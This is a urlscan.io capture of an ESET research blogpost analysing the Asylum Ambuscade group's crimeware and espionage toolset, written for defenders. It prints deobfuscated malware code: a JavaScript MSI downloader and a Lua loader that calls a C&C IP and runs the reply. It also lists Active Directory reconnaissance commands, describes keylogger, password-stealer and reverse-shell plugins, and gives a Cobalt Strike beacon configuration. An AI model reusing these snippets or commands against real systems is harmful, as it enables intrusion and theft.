www.welivesecurity.com Open in urlscan Pro
2a02:26f0:780::210:ca08 Public Scan

Back to summary

URL:
https://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/
Submission: On June 08 via api (June 8th 2023, 1:40:07 pm UTC) from TR — Scanned from DE

Form analysis
5 forms found in the DOM

GET https://www.welivesecurity.com/

<form action="https://www.welivesecurity.com/" class="basic-searchform imc dark col-md-12 col-sm-10 col-xs-12" method="get" role="search">
  <div class="search-input clearfix">
    <input type="text" name="s" value="" placeholder="Search..." class="imc">
    <button class="imc">
      <span class="icomoon icon-icon_search imc"></span>
    </button>
  </div>
</form>

GET https://www.welivesecurity.com/

<form action="https://www.welivesecurity.com/" class="basic-searchform imc dark col-md-12 col-sm-10 col-xs-12" method="get" role="search">
  <div class="search-input clearfix">
    <input type="text" name="s" value="" placeholder="Search..." class="imc">
    <button class="imc">
      <span class="icomoon icon-icon_search imc"></span>
    </button>
  </div>
</form>

GET https://www.welivesecurity.com/

<form action="https://www.welivesecurity.com/" class="basic-searchform imc  col-md-12 col-sm-10 col-xs-12" method="get" role="search">
  <div class="search-input clearfix">
    <input type="text" name="s" value="" placeholder="Search..." class="imc">
    <button class="imc">
      <span class="icomoon icon-icon_search imc"></span>
    </button>
  </div>
</form>

POST https://enjoy.eset.com/pub/rf

<form action="https://enjoy.eset.com/pub/rf" class="basic-searchform col-md-12 col-sm-12 col-xs-12 no-padding newsletter" method="post" role="search">
  <div class="search-input clearfix">
    <input type="text" name="EMAIL_ADDRESS_" value="" placeholder="Email...">
    <input type="hidden" name="TOPIC" value="We Live Security Ukraine Newsletter">
    <input type="hidden" name="_ri_" value="X0Gzc2X%3DAQpglLjHJlTQGgXv4jDGEK4KW2uhw0qgUzfwuivmOJOPCgzgo9vsI3VwjpnpgHlpgneHmgJoXX0Gzc2X%3DAQpglLjHJlTQGzbD6yU2pAgzaJM16bkTA7tOwuivmOJOPCgzgo9vsI3">
    <input type="hidden" name="_ei_" value="Ep2VKa8UKNIAPP_2GAEW0bY">
    <input type="hidden" name="_di_" value="m0a5n0j02duo9clmm4btuu5av8rdtvqfqd03v1hallrvcob47ad0">
    <input type="hidden" name="EMAIL_PERMISSION_STATUS_" value="O">
    <input type="hidden" name="CONTACT_SOURCE_MOST_RECENT" value="WLS_Subscribe_Form">
    <button class="button-flag"> Submit </button>
  </div>
</form>

POST https://enjoy.eset.com/pub/rf

<form action="https://enjoy.eset.com/pub/rf" class="basic-searchform col-md-12 col-sm-12 col-xs-12 no-padding newsletter" method="post" role="search">
  <div class="search-input clearfix">
    <input type="text" name="EMAIL_ADDRESS_" value="" placeholder="Email...">
    <input type="hidden" name="NEWSLETTER" value="We Live Security">
    <input type="hidden" name="_ri_" value="X0Gzc2X%3DAQpglLjHJlTQGgXv4jDGEK4KW2uhw0qgUzfwuivmOJOPCgzgo9vsI3VwjpnpgHlpgneHmgJoXX0Gzc2X%3DAQpglLjHJlTQGzbD6yU2pAgzaJM16bkTA7tOwuivmOJOPCgzgo9vsI3">
    <input type="hidden" name="_ei_" value="Ep2VKa8UKNIAPP_2GAEW0bY">
    <input type="hidden" name="_di_" value="m0a5n0j02duo9clmm4btuu5av8rdtvqfqd03v1hallrvcob47ad0">
    <input type="hidden" name="EMAIL_PERMISSION_STATUS_" value="O">
    <input type="hidden" name="CONTACT_SOURCE_MOST_RECENT" value="WLS_Subscribe_Form">
    <button class=""> Submit </button>
  </div>
</form>

Text Content

In English
* Em Português
* En français
* En Español
* In Deutsch

Menu toggle menu

* All Posts
* Ukraine Crisis – Digital Security Resource Center
* We Live Progress
* Research
* How To
* Videos
* White Papers
* Threat Reports
* Resources
* Our Experts

* Em Português
* En français
* En Español
* In Deutsch

Award-winning news, views, and insight from the ESET security community

ASYLUM AMBUSCADE: CRIMEWARE OR CYBERESPIONAGE?

A curious case of a threat actor at the border between crimeware and
cyberespionage
Matthieu Faou
8 Jun 2023 - 11:30AM
Share

A curious case of a threat actor at the border between crimeware and
cyberespionage

Asylum Ambuscade is a cybercrime group that has been performing cyberespionage
operations on the side. They were first publicly outed in March 2022 by
Proofpoint researchers after the group targeted European government staff
involved in helping Ukrainian refugees, just a few weeks after the start of the
Russia-Ukraine war. In this blogpost, we provide details about the early 2022
espionage campaign and about multiple cybercrime campaigns in 2022 and 2023.

Key points of this blogpost:

* Asylum Ambuscade has been operating since at least 2020.
* It is a crimeware group that targets bank customers and cryptocurrency
traders in various regions, including North America and Europe.
* Asylum Ambuscade also does espionage against government entities in Europe
and Central Asia.
* Most of the group’s implants are developed in script languages such as
AutoHotkey, JavaScript, Lua, Python, and VBS.

CYBERESPIONAGE CAMPAIGNS

Asylum Ambuscade has been running cyberespionage campaigns since at least 2020.
We found previous compromises of government officials and employees of
state-owned companies in Central Asia countries and Armenia.

In 2022, and as highlighted in the Proofpoint publication, the group targeted
government officials in several European countries bordering Ukraine. We assess
that the goal of the attackers was to steal confidential information and webmail
credentials from official government webmail portals.

The compromise chain starts with a spearphishing email that has a malicious
Excel spreadsheet attachment. Malicious VBA code therein downloads an MSI
package from a remote server and installs SunSeed, a downloader written in Lua.

Note that we observed some variations in the attachments. In June 2022, the
group used an exploit of the Follina vulnerability (CVE-2022-30190) instead of
malicious VBA code. This document is shown in Figure 1. It is written in
Ukrainian and the decoy is about a security alert regarding a Gamaredon (another
well-known espionage group) attack in Ukraine.

Figure 1. Document leveraging the Follina vulnerability

Then, if the machine is deemed interesting, the attackers deploy the next stage:
AHKBOT. This is a downloader written in AutoHotkey that can be extended with
plugins, also written in AutoHotkey, in order to spy on the victim’s machine. An
analysis of the group’s toolset is provided later in the blogpost.

CYBERCRIME CAMPAIGNS

Even though the group came into the spotlight because of its cyberespionage
operations, it has been mostly running cybercrime campaigns since early 2020.

Since January 2022, we have counted more than 4,500 victims worldwide. While
most of them are located in North America, as shown in Figure 2, it should be
noted that we have also seen victims in Asia, Africa, Europe, and South America.

Figure 2. Geographical distribution of victims since January 2022

The targeting is very wide and mostly includes individuals, cryptocurrency
traders, and small and medium businesses (SMBs) in various verticals.

While the goal of targeting cryptocurrency traders is quite obvious – stealing
cryptocurrency – we don’t know for sure how Asylum Ambuscade monetizes its
access to SMBs. It is possible the group sells the access to other crimeware
groups who might, for example, deploy ransomware. We have not observed this in
our telemetry, though.

Asylum Ambuscade’s crimeware compromise chain is, overall, very similar to the
one we describe for the cyberespionage campaigns. The main difference is the
compromise vector, which can be:

* A malicious Google Ad redirecting to a website delivering a malicious
JavaScript file (as highlighted in this SANS blogpost)
* Multiple HTTP redirections in a Traffic Direction System (TDS). The TDS used
by the group is referred to as 404 TDS by Proofpoint. It is not exclusive to
Asylum Ambuscade and we observed it was, for example, used by another threat
actor to deliver Qbot. An example of a redirection chain, captured by io, is
shown in Figure 3.

Figure 3. 404 TDS redirection chain, as captured by urlscan.io – numbers
indicate the redirections in sequence

In addition to the different compromise vector, the group developed SunSeed
equivalents in other scripting languages such as Tcl and VBS. In March 2023, it
developed an AHKBOT equivalent in Node.js that we named NODEBOT. We believe
those changes were intended to bypass detections from security products. An
overview of the compromise chain is provided in Figure 4.

Figure 4. Compromise chain

ATTRIBUTION

We believe that the cyberespionage and cybercrime campaigns are operated by the
same group.

* The compromise chains are almost identical in all campaigns. In particular,
SunSeed and AHKBOT have been widely used for both cybercrime and
cyberespionage.
* We don’t believe that SunSeed and AHKBOT are sold on the underground market.
These tools are not very sophisticated in comparison to other crimeware tools
for sale, the number of victims is quite low were it a toolset shared among
multiple groups, and the network infrastructure is consistent across
campaigns.

As such, we believe that Asylum Ambuscade is a cybercrime group that is doing
some cyberespionage on the side.

We also believe that these three articles describe incidents related to the
group:

* A TrendMicro article from 2020: Credential Stealer Targets US, Canadian Bank
Customers
* A Proofpoint article from 2022: Asylum Ambuscade: State Actor Uses Lua-based
Sunseed Malware to Target European Governments and Refugee Movement
* A Proofpoint article from 2023: Screentime: Sometimes It Feels Like
Somebody’s Watching Me

TOOLSET

MALICIOUS JAVASCRIPT FILES

In most crimeware campaigns run by the group, the compromise vector is not a
malicious document, but a JavaScript file downloaded from the previously
documented TDS. Note that it has to be manually executed by the victim, so the
attackers are trying to entice people into clicking on the files by using
filenames such as Document_12_dec-1532825.js, TeamViewer_Setup.js, or
AnyDeskInstall.js.

Those scripts are obfuscated using random variable names and junk code, most
likely intended to bypass detections. An example is provided in Figure 5.

Figure 5. Obfuscated JavaScript downloader

Once deobfuscated, this script can be summarized in two lines:

var obj = new ActiveXObject("windowsinstaller.installer");
obj.InstallProduct("https://namesilo.my[.]id/css/ke.msi");
1
2
var obj = new ActiveXObject("windowsinstaller.installer");
obj.InstallProduct("https://namesilo.my[.]id/css/ke.msi");

FIRST-STAGE DOWNLOADERS

The first stage downloaders are dropped by an MSI package downloaded by either a
malicious document or a JavaScript file. There are three versions of this
downloader:

* Lua (SunSeed)
* Tcl
* VBS

SunSeed is a downloader written in the Lua language and heavily obfuscated, as
shown in Figure 6.

Figure 6. The SunSeed Lua variant is heavily obfuscated

Once manually deobfuscated, the main function of the script looks like this:

require('socket.http') serial_number = Drive.Item('C').SerialNumber
server_response = socket.request(http://84.32.188[.]96/ + serial_number)
pcall(loadstring(server_response)) collectgarbage() <jump to the start and
retry>
1
2
3
4
5
6
require('socket.http')
serial_number = Drive.Item('C').SerialNumber
server_response = socket.request(http://84.32.188[.]96/ + serial_number)
pcall(loadstring(server_response))
collectgarbage()
<jump to the start and retry>

It gets the serial number of the C: drive and sends a GET request to
http://<C&C>/<serial_number> using the User-Agent LuaSocket 2.0.2. It then tries
to execute the reply. This means that SunSeed expects to receive additional Lua
scripts from the C&C server. We found two of those scripts: install and move.

install is a simple Lua script that downloads an AutoHotkey script into
C:\ProgramData\mscoree.ahk and the legitimate AutoHotkey interpreter into
C:\ProgramData\mscoree.exe, as shown in Figure 7. This AutoHotkey script is
AHKBOT, the second stage downloader.

Figure 7. Lua script that downloads an AutoHotkey script

An even simpler Lua script, move, is shown in Figure 8. It is used to reassign
management of a victimized computer from one C&C server to another. It is not
possible to update the hardcoded SunSeed C&C server; to complete a C&C
reassignment, a new MSI installer needs to be downloaded and executed, exactly
as when the machine was first compromised.

Figure 8. Lua script to move management of a compromised machine from one C&C
server to another

As mentioned above, we found another variant of SunSeed developed using the Tcl
language instead of Lua, as shown in Figure 9. The main difference is that it
doesn’t send the C: drive’s serial number in the GET request.

Figure 9. SunSeed variant in Tcl

The third variant was developed in VBS, as shown in Figure 10. The main
difference is that it doesn’t download and interpret additional code, but
downloads and executes an MSI package.

Figure 10. SunSeed variant in VBS

SECOND-STAGE DOWNLOADERS

The main second-stage downloader is AHKBOT, developed in AutoHotkey. As shown in
Figure 11, it sends a GET request, with the User-Agent AutoHotkey (the default
value used by AutoHotkey), to http://<C&C>/<serial_number_of_C_drive>-RP, almost
exactly as the earlier SunSeed. RP might be a campaign identifier, as it changes
from sample to sample.

Figure 11. AHKBOT

AHKBOT can be found on disk at various locations, such as
C:\ProgramData\mscoree.ahk or C:\ProgramData\adb.ahk. It downloads and
interprets spy plugins, also developed in AutoHotkey. A summary of the 21
plugins is provided in Table 1.

Table 1. SunSeed plugins

Plugin nameDescription assDownload and execute a Cobalt Strike loader packed
with VMProtect. The beacon’s configuration extracted using the tool
CobaltStrikeParser is provided in the IoCs in the Cobalt Strike configuration
section. connectSend the log message connected! to the C&C server.
deletecookiesDownload SQLite from /download?path=sqlite3slashsqlite3dotdll via
HTTP from its C&C server, then delete browser cookies for the domains td.com (a
Canadian bank) and mail.ru. We don’t know why the attackers need to delete
cookies, especially for these domains. It’s possible it is intended to delete
session cookies to force its victims to reenter their credentials that would
then be captured by the keylogger. deskscreenTake a screenshot using
Gdip.BitmapFromScreen and send it to the C&C server. deskscreenonSimilar to
deskscreen but take screenshots in a 15-second loop. deskscreenoffStop the
deskscreenon loop. domainGather information about the Active Directory using the
following commands:
· cmd /c chcp 65001 && net group "domain admins" /domain
· cmd /c chcp 65001 && net group "enterprise admins" /domain
· cmd /c chcp 65001 && net group ""Domain Computers"" /domain
· cmd /c chcp 65001 && nltest /dclist:
· cmd /c chcp 65001 && nltest /DOMAIN_TRUSTS
· cmd /c chcp 65001 && ipconfig /all
· cmd /c chcp 65001 && systeminfo hardwareGet victim’s host information using
WMI queries:
· Select * from Win32_OperatingSystem
· SELECT * FROM Win32_LogicalDisk
· SELECT * FROM Win32_Processor
· Select * from Win32_OperatingSystem
· SELECT * FROM Win32_VideoController
· Select * from Win32_NetworkAdapterConfiguration WHERE IPEnabled = True
· Select * from FirewallProduct
· Select * from AntiSpywareProduct
· Select * from AntiVirusProduct
· SELECT * FROM Win32_Product
· SELECT Caption,ExecutablePath,ProcessID FROM Win32_Process where
ExecutablePath is not null
and send to the C&C server. hvnconDownload and execute a custom hVNC (hidden
VNC) application from
http://<C&C>/download?path=hvncslashhvncdotzip hvncoffStop the hVNC by executing
taskkill /f /im hvnc.exe. installchromeDownload
http:///download?path=chromeslashchromedotzip, a legitimate copy of Google
Chrome, and unpack it into %LocalAppData%\Google\‌Chrome\Application. This copy
of Chrome is likely used by hVNC if the victim doesn’t have Chrome installed.
keylogonStart the keylogger, hooked input using DllCall("SetWindowsHookEx",
[…]). The keystrokes are sent to the C&C server when the active application
changes. keylogoffStop the keylogger. passwordsSteal passwords from Internet
Explorer, Firefox, and Chromium-based browsers. It downloads SQLite to read the
browser storages. It can also decrypt locally encrypted passwords by calling the
Microsoft CryptUnprotectData function. Stolen passwords are sent to the C&C
server.

This plugin looks very similar to the password stealer described by Trend Micro
in 2020, including the hard drive serial numbers used for debugging: 605109072
and 2786990575. This could indicate that it is still being developed on the same
machines. rutservonDownload a remote access trojan (RAT) from
http://<C&C>/‌download?path=rutservslashagent6dot10dotexe (SHA-1:
3AA8A4554B175DB9DA5EEB7824B5C047638A6A9D).
This is a commercial RAT developed by Remote Utilities LLC that provides full
control over the machine on which it is installed. rutservoffKill the RAT.
stealDownload and execute an infostealer – probably based on Rhadamanthys.
tasklistList running processes by using the WMI query Select * from
Win32_Process. towakeMove the mouse using MouseMove, 100, 100. This is likely to
prevent the computer from going to sleep, especially given the name of the
plugin. updateDownload a new version of SunSeed AutoHotkey from the C&C server
and replace the current SunSeed on disk. The AutoHotkey interpreter is located
in C:\ProgramData\adb.exe. wndlistList active windows by calling WinGet windows,
List (Autohotkey syntax).

The plugins send the result back to the C&C server using a log function, as
shown in Figure 12.

Figure 12. Log function

In March 2023, the attackers developed a variant of AHKBOT in Node.js that we
have named NODEBOT – see Figure 13.

Figure 13. NODEBOT

The attackers also rewrote some AHKBOT plugins in JavaScript to make them
compatible with NODEBOT. So far, we have observed the following plugins (an
asterisk indicates that the plugin is new to NODEBOT):

* connect
* deskscreen
* hardware
* hcmdon (a reverse shell in Node.js)*
* hvncoff
* hvncon
* keylogoff
* keylogon (download and execute the AutoHotkey keylogger)
* mods (download and install hVNC)*
* passwords
* screen

CONCLUSION

Asylum Ambuscade is a cybercrime group mostly targeting SMBs and individuals in
North America and Europe. However, it appears to be branching out, running some
recent cyberespionage campaigns on the side, against governments in Central Asia
and Europe from time to time.

It is quite unusual to catch a cybercrime group running dedicated cyberespionage
operations, and as such we believe that researchers should keep close track of
Asylum Ambuscade activities.

ESET Research offers private APT intelligence reports and data feeds. For any
inquiries about this service, visit the ESET Threat Intelligence page.

IOCS

FILES

SHA-1FilenameESET detection nameDescription
2B42FD41A1C8AC12221857DD2DF93164A71B95D7ass.dllWin64/Packed.VMProtect.OXCobalt
Strike loader. D5F8ACAD643EE8E1D33D184DAEA0C8EA8E7FD6F8M_suri antiinfla_ioniste
Polonia.docDOC/TrojanDownloader.Agent.AAPDocument exploiting the Follina
vulnerability.
57157C5D3C1BB3EB3E86B24B1F4240C867A5E94FN/AWin32/TrojanDownloader.AutoHK.KHAHKBOT.
7DB446B95D5198330B2B25E4BA6429C57942CFC9N/AVBS/Agent.QOFPython screenshotter.
5F67279C195F5E8A35A24CBEA76E25BAD6AB6E8EN/AVBS/TrojanDownloader.Agent.YDQVBS
downloader.
C98061592DE61E34DA280AB179465580947890DEinstall.msiJS/Agent.QRINODEBOT.
519E388182DE055902C656B2D95CCF265A96CEABDocument_12_dec-1532825.jsJS/TrojanDownloader.Agent.ZJMMalicious
JavaScript file distributed via the TDS.
AC3AFD14AD1AEA9E77A84C84022B4022DF1FC88BahkWin32/Spy.AHK.ADAHKBOT plugin.
64F5AC9F0C6C12F2A48A1CB941847B0662734FBFassWin32/TrojanDownloader.AHK.NAHKBOT
plugin. 557C5150A44F607EC4E7F4D0C0ED8EE6E9D12ADFconnectWin32/Spy.AHK.ADAHKBOT
plugin.
F85B82805C6204F34DB0858E2F04DA9F620A0277deletecookiesWin32/Spy.AHK.ADAHKBOT
plugin. 5492061DE582E71B2A5DA046536D4150F6F497F1deskscreenWin32/Spy.AHK.ADAHKBOT
plugin.
C554100C15ED3617EBFAAB00C983CED5FEC5DB11deskscreenoffWin32/Spy.AHK.ADAHKBOT
plugin.
AD8143DE4FC609608D8925478FD8EA3CD9A37C5DdeskscreenonWin32/Spy.AHK.ADAHKBOT
plugin.
F2948C27F044FC6FB4849332657801F78C0F7D5EdomainWin32/TrojanDownloader.AutoHK.KHAHKBOT
plugin. 7AA23E871E796F89C465537E6ECE962412CDA636hardwareWin32/Spy.AHK.ADAHKBOT
plugin. 384961E19624437EB4EB22B1BF45953D7147FB8FhvncoffWin32/Spy.AHK.ADAHKBOT
plugin. 7FDB9A73B3F13DBD94D392132D896A5328DACA59hvnconWin32/Spy.AHK.ADAHKBOT
plugin.
3E38D54CC55A48A3377A7E6A0800B09F2E281978installchromeWin32/Spy.AHK.ADAHKBOT
plugin. 7F8742778FC848A6FBCFFEC9011B477402544171keylogoffWin32/Spy.AHK.ADAHKBOT
plugin. 29604997030752919EA42B6D6CEE8D3AE28F527EkeylogonWin32/Spy.AHK.ADAHKBOT
plugin. 7A78AF75841C2A8D8A5929C214F08EB92739E9CBpasswordsWin32/Spy.AHK.ABAHKBOT
plugin. 441369397D0F8DB755282739A05CB4CF52113C40rutservoffWin32/Spy.AHK.ADAHKBOT
plugin. 117ECFA95BE19D5CF135A27AED786C98EC8CE50BrutservonWin32/Spy.AHK.ADAHKBOT
plugin. D24A9C8A57C08D668F7D4A5B96FB7B5BA89D74C3stealWin32/Spy.AHK.AEAHKBOT
plugin. 95EDC096000C5B8DA7C8F93867F736928EA32575towakeWin32/Spy.AHK.ADAHKBOT
plugin. 62FA77DAEF21772D599F2DC17DBBA0906B51F2D9updateWin32/Spy.AHK.ADAHKBOT
plugin. A9E3ACFE029E3A80372C0BB6B7C500531D09EDBEwndlistWin32/Spy.AHK.ADAHKBOT
plugin. EE1CFEDD75CBA9028904C759740725E855AA46B5tasklistWin32/Spy.AHK.ADAHKBOT
plugin.

NETWORK

IPDomainHosting providerFirst seenDetails 5.39.222[.]150N/AHostkey_NL abuse,
ORG-HB14-RIPEFebruary 27, 2022C&C server. 5.44.42[.]27snowzet[.]comGLOBAL
INTERNET SOLUTIONS LLCDecember 7, 2022Cobalt Strike C&C server.
5.230.68[.]137N/AGHOSTnet GmbHSeptember 5, 2022C&C server.
5.230.71[.]166N/AGHOSTnet GmbHAugust 17, 2022C&C server.
5.230.72[.]38N/AGHOSTnet GmbHSeptember 24, 2022C&C server.
5.230.72[.]148N/AGHOSTnet GmbHSeptember 26, 2022C&C server.
5.230.73[.]57N/AGHOSTnet GmbHAugust 9, 2022C&C server. 5.230.73[.]63N/AGHOSTnet
GmbHJune 2, 2022C&C server. 5.230.73[.]241N/AGHOSTnet GmbHAugust 20, 2022C&C
server. 5.230.73[.]247N/AGHOSTnet GmbHAugust 9, 2022C&C server.
5.230.73[.]248N/AGHOSTnet GmbHJune 1, 2022C&C server. 5.230.73[.]250N/AGHOSTnet
GmbHJune 2, 2022C&C server. 5.252.118[.]132N/AaezagroupMarch 1, 2023C&C server.
5.252.118[.]204N/AaezagroupMarch 1, 2023C&C server.
5.255.88[.]222N/AServeriusMay 28, 2022C&C server.
23.106.123[.]119N/AIRT-LSW-SGFebruary 4, 2022C&C server.
31.192.105[.]28N/AHOSTKEY B.V.February 23, 2022C&C server. 45.76.211[.]131N/AThe
Constant Company, LLCJanuary 19, 2023C&C server. 45.77.185[.]151N/AVultr
Holdings, LLCDecember 16, 2022C&C server. 45.132.1[.]238N/AMiglovets Egor
AndreevichNovember 7, 2022C&C server. 45.147.229[.]20N/ACOMBAHTONJanuary 22,
2022C&C server. 46.17.98[.]190N/AHostkey_NL abuse, ORG-HB14-RIPEAugust 31,
2020C&C server. 46.151.24[.]197N/AHosting technology LTDJanuary 1, 2023C&C
server. 46.151.24[.]226N/AHosting technology LTDDecember 23, 2022C&C server.
46.151.25[.]15N/AHosting technology LTDDecember 27, 2022C&C server.
46.151.25[.]49N/APodolsk Electrosvyaz Ltd.December 29, 2022C&C server.
46.151.28[.]18N/AHosting technology LTDJanuary 1, 2023C&C server.
51.83.182[.]153N/AOVHMarch 8, 2022C&C server. 51.83.189[.]185N/AOVHMarch 5,
2022C&C server. 62.84.99[.]195N/AVDSINA-NLMarch 27, 2023C&C server.
62.204.41[.]171N/AHORIZONMSK-ASDecember 12, 2022C&C server.
77.83.197[.]138N/AHZ-UK-ASMarch 7, 2022C&C server. 79.137.196[.]121N/AAEZA GROUP
LtdMarch 1, 2023C&C server. 79.137.197[.]187N/AaezagroupDecember 1, 2022C&C
server. 80.66.88[.]155N/AXHOST INTERNET SOLUTIONS LPFebruary 24, 2022C&C server.
84.32.188[.]29N/AUAB Cherry ServersJanuary 10, 2022C&C server.
84.32.188[.]96N/AUAB Cherry ServersJanuary 29, 2022C&C server.
85.192.49[.]106N/AHosting technology LTDDecember 25, 2022C&C server.
85.192.63[.]13N/AAEZA GROUP LtdDecember 27, 2022C&C server.
85.192.63[.]126N/AaezagroupMarch 5, 2023C&C server.
85.239.60[.]40N/AClouviderApril 30, 2022C&C server. 88.210.10[.]62N/AHosting
technology LTDDecember 12, 2022C&C server. 89.41.182[.]94N/AAbuse-C Role,
ORG-HS136-RIPESeptember 3, 2021C&C server. 89.107.10[.]7N/AMiglovets Egor
AndreevichDecember 4, 2022C&C server. 89.208.105[.]255N/AAEZA GROUP LtdDecember
22, 2022C&C server. 91.245.253[.]112N/AM247 EuropeMarch 4, 2022C&C server.
94.103.83[.]46N/AHosting technology LTDDecember 11, 2022C&C server.
94.140.114[.]133N/ANANO-ASMarch 8, 2022C&C server.
94.140.114[.]230N/ANANO-ASApril 13, 2022C&C server.
94.140.115[.]44N/ANANO-ASApril 1, 2022C&C server. 94.232.41[.]96N/AXHOST
INTERNET SOLUTIONS LPOctober 2, 2022C&C server. 94.232.41[.]108N/AXHOST INTERNET
SOLUTIONS LPAugust 19, 2022C&C server.
94.232.43[.]214N/AXHOST-INTERNET-SOLUTIONSOctober 10, 2022C&C server.
98.142.251[.]26N/ABlueVPS OUApril 29, 2022C&C server. 98.142.251[.]226N/ABlueVPS
OUApril 12, 2022C&C server. 104.234.118[.]163N/AIPXO LLCMarch 1, 2023C&C server.
104.248.149[.]122N/ADigitalOcean, LLCDecember 11, 2022C&C server.
109.107.173[.]72N/AHosting technology LTDJanuary 20, 2023C&C server.
116.203.252[.]67N/AHetzner Online GmbH - Contact Role, ORG-HOA1-RIPEMarch 5,
2022C&C server. 128.199.82[.]141N/ADigital OceanDecember 11, 2022C&C server.
139.162.116[.]148N/AAkamai Connected CloudMarch 3, 2022C&C server.
141.105.64[.]121N/AHOSTKEY B.V.March 21, 2022C&C server.
146.0.77[.]15N/AHostkey_NLApril 10, 2022C&C server. 146.70.79[.]117N/AM247
LtdMarch 2, 2022C&C server. 157.254.194[.]225N/ATier.Net Technologies LLCMarch
1, 2023C&C server. 157.254.194[.]238N/ATier.Net Technologies LLCMarch 13,
2023C&C server. 172.64.80[.]1namesilo.my[.]idCloudflare, Inc.December 14,
2022C&C server. 172.86.75[.]49N/ABL NetworksMay 17, 2021C&C server.
172.104.94[.]104N/ALinodeMarch 5, 2022C&C server. 172.105.235[.]94N/ALinodeApril
5, 2022C&C server. 172.105.253[.]139N/AAkamai Connected CloudMarch 3, 2022C&C
server. 176.124.214[.]229N/AVDSINA-NLDecember 26, 2022C&C server.
176.124.217[.]20N/AHosting technology LTDMarch 2, 2023C&C server.
185.70.184[.]44N/AHostkey_NLApril 12, 2021C&C server. 185.82.126[.]133N/ASia
Nano ITMarch 12, 2022C&C server. 185.123.53[.]49N/ABV-EU-ASMarch 14, 2022C&C
server. 185.150.117[.]122N/AUAB Cherry ServersApril 2, 2021C&C server.
185.163.45[.]221N/AMivoCloud SRLJanuary 2, 2023C&C server.
193.109.69[.]52N/AHostkey_NLNovember 5, 2021C&C server.
193.142.59[.]152N/AHostShield LTD AdminNovember 17, 2022C&C server.
193.142.59[.]169N/AColocationX Ltd.November 8, 2022C&C server.
194.180.174[.]51N/AMivoCloud SRLDecember 24, 2022C&C server.
195.2.81[.]70N/AHosting technology LTDSeptember 27, 2022C&C server.
195.133.196[.]230N/AJSC Mediasoft ekspertJuly 15, 2022C&C server.
212.113.106[.]27N/AAEZA GROUP LtdJanuary 28, 2023C&C server.
212.113.116[.]147N/AJY Mobile CommunicationsMarch 1, 2023C&C server.
212.118.43[.]231N/AHosting technology LTDMarch 1, 2023C&C server.
213.109.192[.]230N/ABV-EU-ASJune 1, 2022C&C server.

COBALT STRIKE CONFIGURATION

BeaconType - HTTP Port - 80 SleepTime - 45000 MaxGetSize - 2801745 Jitter - 37
MaxDNS - Not Found PublicKey_MD5 - e4394d2667cc8f9d0af0bbde9e808c29 C2Server -
snowzet[.]com,/jquery-3.3.1.min.js UserAgent - Mozilla/5.0 (compatible; MSIE
10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN)
HttpPostUri - /jquery-3.3.2.min.js Malleable_C2_Instructions - Remove 1522 bytes
from the end Remove 84 bytes from the beginning Remove 3931 bytes from the
beginning Base64 URL-safe decode XOR mask w/ random key HttpGet_Metadata -
ConstHeaders Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer:
http://code.jquery.com/ Accept-Encoding: gzip, deflate Metadata base64url
prepend "__cfduid=" header "Cookie" HttpPost_Metadata - ConstHeaders Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer:
http://code.jquery.com/ Accept-Encoding: gzip, deflate SessionId mask base64url
parameter "__cfduid" Output mask base64url print PipeName - Not Found DNS_Idle -
Not Found DNS_Sleep - Not Found SSH_Host - Not Found SSH_Port - Not Found
SSH_Username - Not Found SSH_Password_Plaintext - Not Found SSH_Password_Pubkey
- Not Found SSH_Banner - HttpGet_Verb - GET HttpPost_Verb - POST HttpPostChunk -
0 Spawnto_x86 - %windir%\syswow64\dllhost.exe Spawnto_x64 -
%windir%\sysnative\dllhost.exe CryptoScheme - 0 Proxy_Config - Not Found
Proxy_User - Not Found Proxy_Password - Not Found Proxy_Behavior - Use IE
settings Watermark - 206546002 bStageCleanup - True bCFGCaution - False KillDate
- 0 bProcInject_StartRWX - False bProcInject_UseRWX - False
bProcInject_MinAllocSize - 17500 ProcInject_PrependAppend_x86 - b'\x90\x90'
Empty ProcInject_PrependAppend_x64 - b'\x90\x90' Empty ProcInject_Execute -
ntdll:RtlUserThreadStart CreateThread NtQueueApcThread-s CreateRemoteThread
RtlCreateUserThread ProcInject_AllocationMethod - NtMapViewOfSection
bUsesCookies - True HostHeader - headersToRemove - Not Found DNS_Beaconing - Not
Found DNS_get_TypeA - Not Found DNS_get_TypeAAAA - Not Found DNS_get_TypeTXT -
Not Found DNS_put_metadata - Not Found DNS_put_output - Not Found DNS_resolver -
Not Found DNS_strategy - round-robin DNS_strategy_rotate_seconds - -1
DNS_strategy_fail_x - -1 DNS_strategy_fail_seconds - -1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
BeaconType - HTTP
Port - 80
SleepTime - 45000
MaxGetSize - 2801745
Jitter - 37
MaxDNS - Not Found
PublicKey_MD5 - e4394d2667cc8f9d0af0bbde9e808c29
C2Server - snowzet[.]com,/jquery-3.3.1.min.js
UserAgent - Mozilla/5.0 (compatible; MSIE 10.0; Windows
NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN)
HttpPostUri - /jquery-3.3.2.min.js
Malleable_C2_Instructions - Remove 1522 bytes from the end
Remove 84 bytes from the beginning
Remove 3931 bytes from the beginning
Base64 URL-safe decode
XOR mask w/ random key
HttpGet_Metadata - ConstHeaders
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://code.jquery.com/
Accept-Encoding: gzip, deflate
Metadata
base64url
prepend "__cfduid="
header "Cookie"
HttpPost_Metadata - ConstHeaders
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://code.jquery.com/
Accept-Encoding: gzip, deflate
SessionId
mask
base64url
parameter "__cfduid"
Output
mask
base64url
print
PipeName - Not Found
DNS_Idle - Not Found
DNS_Sleep - Not Found
SSH_Host - Not Found
SSH_Port - Not Found
SSH_Username - Not Found
SSH_Password_Plaintext - Not Found
SSH_Password_Pubkey - Not Found
SSH_Banner -
HttpGet_Verb - GET
HttpPost_Verb - POST
HttpPostChunk - 0
Spawnto_x86 - %windir%\syswow64\dllhost.exe
Spawnto_x64 - %windir%\sysnative\dllhost.exe
CryptoScheme - 0
